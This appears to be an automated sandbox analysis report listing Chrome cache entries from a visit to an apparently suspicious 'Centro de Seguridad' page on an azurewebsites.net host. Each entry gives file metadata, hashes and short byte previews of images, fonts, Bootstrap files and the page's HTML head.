                          Preview:.PNG........IHDR.......f......W......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1591f8ad-93f1-7044-8d42-50dd0c403119" xmpMM:DocumentID="xmp.did:9675A268FD9111EA911BE4CA74763C81" xmpMM:InstanceID="xmp.iid:9675A267FD9111EA911BE4CA74763C81" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3b34a7a6-64f6-8f46-9c56-262bea989f20" stRef:documentID="adobe:docid:photoshop:b686ffd4-d249-364e-8585-3c9b14110c56"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>}..t...mIDATx....x...7...

                          Chrome Cache Entry: 57

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1920 x 1126, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):386648
                          Entropy (8bit):7.977972541740715
                          Encrypted:false
                          SSDEEP:6144:tLfaMQeft3/wemTdFcUxZynpcty+jmoNuAGBEfY9cH5XyCcuqzhVS9g:tL5QUt3obTdyQypct0oNbY+ZXyCcuqzf
                          MD5:DB2C775D2583118BF4464DD65A58535B
                          SHA1:45413378BF16997DECF585915931305788E55328
                          SHA-256:DE9FBE2DE348E17BD4948011260EF297C4102B69068692DAABA02BF632ACD291
                          SHA-512:C36DE48C37A5E6218D63A1051C3C3D4D0AD493D53DAF693C3474DFA8EAB4E04EA413F50BAC3C5EEEAC4CA1FC807D74D6C1343A4ED4EEFA9CD43B91EDC546900B
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/background-2.png
                          Preview:.PNG........IHDR.......f......W......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1591f8ad-93f1-7044-8d42-50dd0c403119" xmpMM:DocumentID="xmp.did:9675A268FD9111EA911BE4CA74763C81" xmpMM:InstanceID="xmp.iid:9675A267FD9111EA911BE4CA74763C81" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3b34a7a6-64f6-8f46-9c56-262bea989f20" stRef:documentID="adobe:docid:photoshop:b686ffd4-d249-364e-8585-3c9b14110c56"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>}..t...mIDATx....x...7...

                          Chrome Cache Entry: 58

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65326)
                          Category:downloaded
                          Size (bytes):160302
                          Entropy (8bit):5.078105585474276
                          Encrypted:false
                          SSDEEP:1536:V47CIJ0T2r+ryEIA1pDEBi8yNcuSEcA1/uypq3SYiLENM6HN26b:S7VSGGq3SYiLENM6HN26b
                          MD5:816AF0EDDD3B4822C2756227C7E7B7EE
                          SHA1:C470239D4C7DB36D56DC3A74A080C62218C6EDC4
                          SHA-256:5B0FBE5B7AD705F6A937C4998AD02F73D8F0D976FE231B74AEF0EC996990C93A
                          SHA-512:32844D968C5B4AD05C0FCCF733FD819A74FEAE0E08B0CC4F917686876CC3E8B18D34513CD16DE89EC02145C30032B4A8C962FDC43EC4AEDD267A7EEF47C2D466
                          Malicious:false
                          Reputation:low
                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css
                          Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo

                          Chrome Cache Entry: 59

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 12 x 12, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):128
                          Entropy (8bit):5.521751404506782
                          Encrypted:false
                          SSDEEP:3:yionv//thPll0ya/lHRthwkBDsTBZtHdEAEhTWT3RvIWitwFB1p:6v/lhPkd5nDspHmAE1WdAWOUp
                          MD5:0BB86CAF792DD7D24731C18CD37BB68E
                          SHA1:DDA1E433A0EAF785B2AA2C6214D5E48CB82A3A25
                          SHA-256:2AC27821BA64D645F36E2AD197492D30C11B10A032CC474554679555F4604622
                          SHA-512:596BB05F2926273D35C4245F87EA3C278A60562E16A5AF3755BF686BA836E5CE74088DE278DFE4DBE4EA87B986F8191589B109E590F2989EF4D28A14319D46A5
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<..."IDATx.b...?.!..@..."...t..8T.. ...3.H.\&.....IEND.B`.

                          Chrome Cache Entry: 60

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 7816, version 1.0
                          Category:downloaded
                          Size (bytes):7816
                          Entropy (8bit):7.974758688549932
                          Encrypted:false
                          SSDEEP:192:Agw5ksLwlyK8F2BXU96Fc575OI3+ga534SlEFwTG4ovej9be:Al5y8FSUMS5VOq1KISlvS4ov+4
                          MD5:25B0E113CA7CCE3770D542736DB26368
                          SHA1:CB726212D5D525021752A1D8470A0FB593E0C49E
                          SHA-256:9338E65FC077355C7A87AE0D64CC101E23B9BF8AD78AE65F0F319C857311B526
                          SHA-512:A0D331E62AB4727F49CA286A1EE7FB81CDDC5BB9EDF71EF84F4BD4FA1552069AF1A82752011BA88FAE80862D034135926B7E99D70E59D626D66D4EDE90E94C30
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2
                          Preview:wOF2..............>P...4.............................`..T.......6..6.$..h. ..D.....03......~.(J........".!]X.......fD .s..I......(&.:..K..3=/.?0.?B........}.}.L....9.!1..6.u....(...m..\.6R.H....(..J.....YXus..2..susq.E^.v.....z..{........BN^...}[a.8&.By.9...*...O......3..zW.|R.I.8 .Z.V. ..v..*.X_F....,[ye....wU.m..U.....}....'.^.jQK..@....n....)...;.. T..@]...hz.>.6.Y.tgeF.p...k?.g.jIb..."'.p.j.W}..X..........0'@.!<..$.<\TG...........^......W..<..LhX...r..Q.8........W.8[...W.z.W...,*`...}...CY..z..m.B...z._..}..0$..F. ....<........!...X.....`.._UY{..k..*..[.+....h..G...x4.h...#...n=.!....G.G..<....~.nS...M.d.RT...g..$:/..j..y.@.FIg.".#..]'...4...n..y.Q.s'..I@P.w..xI.......#.J.n.n.i...'....@..H...H..1.;7...ddSF.d..].*...Z......*W.../S....^V..k..%.......CF....B4.kN....Mp.......+..i...M.>.`m...=..$c..$.h.t..|..d+...6j..W...~a.M.'4..f.`...( .0Vq,.&f.?k.%i.|tr..`k...F..{l.T.T=.......aK..F....nAu..."....Cpc..B.`..s...,S.......P._[K?..+...|2...z....

                          Chrome Cache Entry: 61

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 29 x 29
                          Category:downloaded
                          Size (bytes):1245
                          Entropy (8bit):6.967521172091232
                          Encrypted:false
                          SSDEEP:24:uDMal1h6A1aWwjx82lY2T3PQVgbNMhyJ3VS0mNuGY8qsCuhy4:A11LNn2bQkJ3CUL8LCGy4
                          MD5:6D0C71AD95C413318E0946960A597318
                          SHA1:297FA9D7797AFCB90CB49ADB045B673672B360EC
                          SHA-256:F2B1758E4D68018096355641F5E7163B0DF07EFC85E9C3513E51949A75C0446D
                          SHA-512:18150B7CFA4F48E4B646F2AB38952CCACE018E05AAB9318E68E56D5C49641D85442E8AF3D95E4394D0E9D30B295D9E865AB23ED4E7983276E130A3EC859B9D85
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbf6a050_v.gif
                          Preview:GIF89a...............................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:381C5193FCB811EAB7F9F85B546A8F09" xmpMM:DocumentID="xmp.did:381C5194FCB811EAB7F9F85B546A8F09"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:381C5191FCB811EAB7F9F85B546A8F09" stRef:documentID="xmp.did:381C5192FCB811EAB7F9F85B546A8F09"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZY

                          Chrome Cache Entry: 62

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 47 x 46, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):1045
                          Entropy (8bit):6.248239976068452
                          Encrypted:false
                          SSDEEP:24:A1h6A1aWwjx82lY2T3PQVvmdN2yJ3V5L75Gs5eq46col:e11LNn2bQpEbJ3fH5ThOol
                          MD5:BF2B460590FBB9D8E9611A6E9006B816
                          SHA1:561E1DAB259D61E798B3CE380527B71B61074FF3
                          SHA-256:EE4BC5FE81FA7C1E8497D79C9C8A96485DF217092D334E9B48FA8840FED11D03
                          SHA-512:ACC9773B532BFF6A1284B78324D9BD51117A6EBFC0C549224BA4B703540DE8869AB1EFF1CCE8CC4FCA00C5B4F47D34FC27FAB27246873326CEE49D2DD5E877C0
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR.../..........{@.....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:2413D6EDFC2911EA865EEF9650A38354" xmpMM:DocumentID="xmp.did:2413D6EEFC2911EA865EEF9650A38354"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2413D6EBFC2911EA865EEF9650A38354" stRef:documentID="xmp.did:2413D6ECFC2911EA865EEF9650A38354"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx.....0......b..".#............N$..B2.U..inw.8p.^g......i......e...x.......<x......J.........[.._....C..

                          Chrome Cache Entry: 63

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (59765)
                          Category:downloaded
                          Size (bytes):60044
                          Entropy (8bit):5.145139926823033
                          Encrypted:false
                          SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk2:wfUnTcWCw6xJxg7aAz
                          MD5:02D223393E00C273EFDCB1ADE8F4F8B1
                          SHA1:0CC93B8421D89C24A889642428B363CB831DE78A
                          SHA-256:79C599DD760CEC0C1621A1AF49D9A2A49DA5D45E1B37D4575BACE0A5E0226582
                          SHA-512:339296DF3B6E2080A65488634AA5DED35A15D9BA5EDB8F203B1AA695C62B13302FC2CECFC37CFA04AD2219BAF0BDDAD4414862DDE5E0B71A7923C3C3A3D61F8D
                          Malicious:false
                          Reputation:low
                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
                          Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function s(){return(s=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&Objec

                          Chrome Cache Entry: 64

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):555
                          Entropy (8bit):4.734589619218495
                          Encrypted:false
                          SSDEEP:12:TjeRHVIdtklI5rvy1INGlTF5TF5TF5TF5TF5TFK:neRH68pTPTPTPTPTPTc
                          MD5:7D34D86E35ADE3769B332E032633EBD9
                          SHA1:CBD7FB5217C686A8C5CDB8E9C9C71B611B4F526A
                          SHA-256:338E171ECD2E7B7B1D89C2BED70F9A33477B1345BE879B35A211925B67476DCF
                          SHA-512:73BF84CA367F4221F33294D9C408B97CFC29BDC23843D12EDDDB20D7072A3A0EB0E874E6198E7AD083A65B6F829B6E11F754BB2F6C074EB4D5184F0D7EC34E17
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/favicon.ico
                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.24.0</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..

                          Chrome Cache Entry: 65

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 47x46, components 3
                          Category:dropped
                          Size (bytes):2004
                          Entropy (8bit):7.15743494951099
                          Encrypted:false
                          SSDEEP:48:Ik11LNn2bQrvFCJ3rJGwVXwiXi6/9JG+LRKtj5:xX2PVXwiXPE+Ls
                          MD5:513307D24832CC64115E69C57DD4F69A
                          SHA1:BA2E4718F5DEC696D5E1E9AB95361F5DFB337F23
                          SHA-256:F70249B342AECD9E3D2367AEA39DF606E92562F9D7945AD8849B36CD3E3A85A1
                          SHA-512:8CD7A72524AC7F3FF510ABC55011DD47D22B79AA008165F5FC96C48142E401F2A099AB1D83C9767B2B7FD4F85638C202DF4D1A247D71368C718482C9A2BAAE7E
                          Malicious:false
                          Reputation:low
                          Preview:......Exif..II*.................Ducky.......d.....,http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:1E4EEBFEFC2911EA8925B92872E41A09" xmpMM:DocumentID="xmp.did:1E4EEBFFFC2911EA8925B92872E41A09"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4EEBFCFC2911EA8925B92872E41A09" stRef:documentID="xmp.did:1E4EEBFDFC2911EA8925B92872E41A09"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................

                          Chrome Cache Entry: 66

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 65 x 80
                          Category:downloaded
                          Size (bytes):1547
                          Entropy (8bit):7.632681045615477
                          Encrypted:false
                          SSDEEP:48:SUvJ0W/qmxUwBZpeHEOJDqxnoiGXe0mu4QEGb:bxR/c2ekOJuoXDmuBb
                          MD5:AF52E51F42FD0C55BC3CF2C8ECE71492
                          SHA1:016F83DA68FF461A5C6AEBCC2A45668317B2F24C
                          SHA-256:E91F304CF7409723968740E6363DDA01B50ACB8E94B5CA05B4A4617666FF095C
                          SHA-512:CE74EB35187B0026C344EFBF71F4D4B49B6771BDFDBBB961A60078AA46932D9E2EDE7BDC40DA60E5ADB0C14CA2FD2E607F49EE3E30B3BC9B5225D8039F257229
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbc8a6e3_v.gif
                          Preview:GIF89aA.P....j................|.....^....p...................................W.....Y.....b..v.....d........!.......,....A.P....`%.di.b....p,...Y..9s...An.3x2....P..8.!........p>....ZC@..J...,....6..G8...../XZORTz)..[SK.}O...p..fOhVrD..u>...ln....g.i0...D...#X.O...(.....%|P...$...D...1.l....s..>..CB...J..P....V..Dz...........p.V...7.,..@..$.l..0.!.....8.@.3.$...&.....(.......f.P.1......X. .#....y.e.@A.Pz8..Z.'<D......]..X@0.....n.Hs.B..KG.. ....Od,...@...R..Q..80$.q.D.E..h.I.c..".Bp......$..K"C..".X....b.]q..UV.:..GP.......5@.p........*...|..QT..........#... .,..3...D.).....B.... _...y}Q].......q....EL.:_D....a..' 6BY{. U..$...M$t..q....p%t..d..d.$`.Y&.(.L...9.uH..'.V.a.....&(2.......B.'V.%\...B.X....CBt.......X!]3.. .8...S. ...D.ip.&......P@..xc...x..|..g.9.P........$...R-......h...0..2.....!.F. .v...*.%d0.j@..nR.4.(3Rx....g....@.c8Hp..&.U..&.."..`.c.9..g.Z.h....^Y.j_......4E... ..#.b...V.Q.".r....@.,.VP...L.,.. ...D.o~"...."D.k..yhA...F..... .Q^.........E.....

                          Chrome Cache Entry: 67

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):88369
                          Entropy (8bit):5.500264672761001
                          Encrypted:false
                          SSDEEP:1536:qHnHen3b6pnuL3ruTC5AiwVruactm38a5zzgnAdeXUBmE7m8nTn6ZnGn6CEO+p9f:eY6pnfm8T6ZG61D
                          MD5:E2D506F7216850E88143A3B76017B650
                          SHA1:9105C1A494969164167A34EE775E7CCFFB8ED63F
                          SHA-256:2FDD9CBB2855C4B09B34E6AD5C865446A185E50EE5FA4FDA876ABA920D19FE32
                          SHA-512:40DB4227EDDBB73401F76B0BD4AA597365F4185C04EFB72066428E6E1450116E1A5A7C238DBBCBCD48079A70600D8B3084871F0C637D8490890828DF690DA5B0
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/
                          Preview:....<!doctype html>....<html lang="en">....<head>.... Google tag (gtag.js) -->..<script async src="https://www.googletagmanager.com/gtag/js?id=G-WGPCQTD2D9"></script>..<script>.. window.dataLayer = window.dataLayer || [];.. function gtag(){dataLayer.push(arguments);}.. gtag('js', new Date());.... gtag('config', 'G-WGPCQTD2D9');..</script>...... <meta charset="utf-8">.... <meta name="viewport" content="width=device-width, initial-scale=1">.... <title>Centro de Seguridad</title>........ <link rel="stylesheet" type="text/css".... href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">.... <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css".... integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">.... <script src="jquery.min.js"></script>.... <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/boo

                          Chrome Cache Entry: 68

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 78 x 68
                          Category:dropped
                          Size (bytes):949
                          Entropy (8bit):7.611134551779901
                          Encrypted:false
                          SSDEEP:24:ImRyJqzXsWywndMDWXi898BJBjOBO5nEzn9qcUo7PU:I4Aqz8Md59ABgO5nEz9wCPU
                          MD5:DA9D153375DA51A616A7663F1504E3A5
                          SHA1:BD81FE60FE017BFE79BE8C1AFED88B659FF166D9
                          SHA-256:9BB88049C3D3F3C172D97246FA148BB725E727847C37E28C3BE156BE240A0C04
                          SHA-512:8CC15D9FF3C6E72AB2924C44B4722C4D4BCACEF7DC29DFA5B135FFABC431C670DE6FD333264DC916C9E1CBB1B56CBB9924518D7278C07E4F62D2D1747F2C8649
                          Malicious:false
                          Reputation:low
                          Preview:GIF89aN.D..........(.!..9.2..I.D...y.ti.d......Y.T0.*R.L...#........A.:...............`.[q.l....e.`!.......,....N.D.... $.di.%2..@$Y.-.j.x.K.q...p(,p...r.C.8..t..4...v....`..c.M.E8r.....#...$gs%.%...Y#C$....T..yK..}B...(.'..^R...8..R..7.6...A..(.tB.:.7.....$.D...(.......D...7........B...:....f..A...:.o.[.C..K.E5Z.S..9.C..J.`..C........*.o.....LH&$.....M......'&D...B. .p....N....A.<....xP..P".L....$X$..3.....g..-.bY<A1...O......}.e=.UH..U.`....5.#b}c..B. b].q....y.Gt.....{}..kX.....\..X.....(.|.q.."6.q.I...Q.6s.R,z.......@....(gN..Y.*..@..[V.#......qB....z&!..P..'....;S..}..).R..r`+..g...v.w~.5..@}#..H..sLH....R.X...EP.6....f....B<0... ....dP.....Q.t...."..Cx.....W.:L|........4PEKL..A06......\9H..G[=h...t....Z%....6....'.c..v..Q4@.j.0.^}uY@.9l......$.#H."w...(............P(h...(.$,..b.h&U.P.g~]..V..jZ...|C.iY.0.FE.XB..8PC:..$......^:..G.....U.._.p*..5..e2...;&Q....$P. .h...@$.l.....X.~.qA..V...KLP.......;

                          Chrome Cache Entry: 69

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 8000, version 1.0
                          Category:downloaded
                          Size (bytes):8000
                          Entropy (8bit):7.97130996744173
                          Encrypted:false
                          SSDEEP:192:GDonmfrEdXT8WrxzRXwyQo3zGEOM7Y2hOMgWnsfYSjv4ENFGwrlKJ:8onPxTzjgyQSzLPXOTIYHJAJ
                          MD5:72993DDDF88A63E8F226656F7DE88E57
                          SHA1:179F97EC0275F09603A8DB94D4380EB584D81CD5
                          SHA-256:F4E80D9DFD374D02989B87A27B5ED4CB78FBB177C27F1478E9A8B0AFB7513149
                          SHA-512:7C20165F9D22A86341E841FD58526209017DCDE2AFE2D0D2A89FE853D95DC69F658D25CF798C71F452DAB09843FC808C1AE87A60B1284134163ABF5A1D93E50A
                          Malicious:false
                          Reputation:low
                          URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2
                          Preview:wOF2.......@......?@.................................`..T..t.*..6..6.$..h. ..T.....1E.r.8...KD....*..2.>L.......0..c.h...y_)s...N..(._C,/.v...7B...Z..gT@....u*.\t.9....{.&.;<...j.2.H-...A.S......E..)..f.Y8vuw^.^_.n{.Z..U.h..Kcm.........E..........'.J.-.-.......=.."...E...../R.8P....>?.]...R..Ag:.Pt..j..s..pG. .!f?.Q.T.".O.....D.r......3>gJN!V.\.!....+.......X.B.v....c9.&iW-[.,.. ...Q.k%I.s.%...d...8q..._~.C.n".v0..6B.eT..?..7.....l....3..7...M...5......k......^.....F.v~|.....3N=.....[.!......}....F(...fA..c)0X$,FYL..=).(h<4...M5..<3.c....K/.{.p....3+'W...Z.[..;.w.....X....nx..v.(c;._.W......|.b.....{...9..A6...V|.N...Z?+|H/.#.W%.._.8,...>._..w...RP..-.?.k7X..".._S.3,J.........&.8Gs.?yH.Yx......I_....._o.0K......(e.Q.W....=...J.7.\k.n.pd.....s..%...sD......_..&-...(.7..6.U..&<~8...9......uV..|h.#m\.d./!....s.......b.j. ."...wX...B.`..Bj=......VnM....p..k.%..U.F..-VN).Y........_..W.p...B..|.j..f..7....).~....n......c.3....t.......s..>...

                          Chrome Cache Entry: 70

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 16 x 16
                          Category:dropped
                          Size (bytes):69
                          Entropy (8bit):4.800672923395278
                          Encrypted:false
                          SSDEEP:3:CsDi/NQlZ/lqMkAI/HyjFB0se:N+/NQlOHSjH0/
                          MD5:3AE573D079DCD1D2DA4086F2C0C72C45
                          SHA1:E7C9DABEC81379373476ED23168DCECB9B8C56AA
                          SHA-256:9CCE08AB28E94790CF78C87E37F8690ACBC6C535E4B43AE7B38506B94538E107
                          SHA-512:C1899B5E08F520B08E5F59EE380C5D108DA99F2EAF5F1EF2FE6D078A1ECF92D83E0A86B98DD1E1BAC7B3A360ACEB9975D7815FFE3416954414A85FC487B2F513
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a.............!.......,.............i..d......v.'..y..).G..;

                          Chrome Cache Entry: 71

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 24 x 9
                          Category:downloaded
                          Size (bytes):102
                          Entropy (8bit):5.604040192344847
                          Encrypted:false
                          SSDEEP:3:CH38qQ/c1/loLHCgKydbGwPMen:08qQ/ciHc+CwUe
                          MD5:EF14D57C065FDBD3C66D017A729CA91F
                          SHA1:2E7B72D674361A9C2B41767CCFBED2486E6695DD
                          SHA-256:6FCBFCDA8A36536A0F9B0BC8C4A6CA451D9BAFD4A879D56697E48E209691BA36
                          SHA-512:671931AEE6F21E9E49B2BB09782E4CD20696472B29E584FDF2F7C32179CB177F9683A05F41BA6DA81A09F0FA09800D2D1267412DACD2C70695A3A501EE28608D
                          Malicious:false
                          Reputation:low
                          URL:https://forwigjoeeiorjegoeirjhhjeri.azurewebsites.net/5f205bbb6fc7d_v.gif
                          Preview:GIF89a.......#.......I.Cv.q-.'......!.......,..........+..\".........1.f...h.....Z...8.t.*n..3.p...;

                          Chrome Cache Entry: 72

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):75
                          Entropy (8bit):4.404993192306941
                          Encrypted:false
                          SSDEEP:3:bY6ExbMoxIaEQvueDxbMoF:EpbMoxLGmbMoF
                          MD5:0E646E2E128C473D6FBA7996A4A94E40
                          SHA1:A4D4FB349D7480C10DA8249C0851EA287A0309BB
                          SHA-256:8CF6666C0C6D23DCF25EED0ECB5C439E484E1DDD598522BC21EB6E454EDAEA33
                          SHA-512:0358B61A2E58E53303F6762CA09D8F2AA0DD3018912B4C6F54114E1EFE3D9238226C8FDF81AFAAB5E1E23CB47015D1AE6801FC0B13B9E8D1A5538ECC698E5E3D
                          Malicious:false
                          Reputation:low
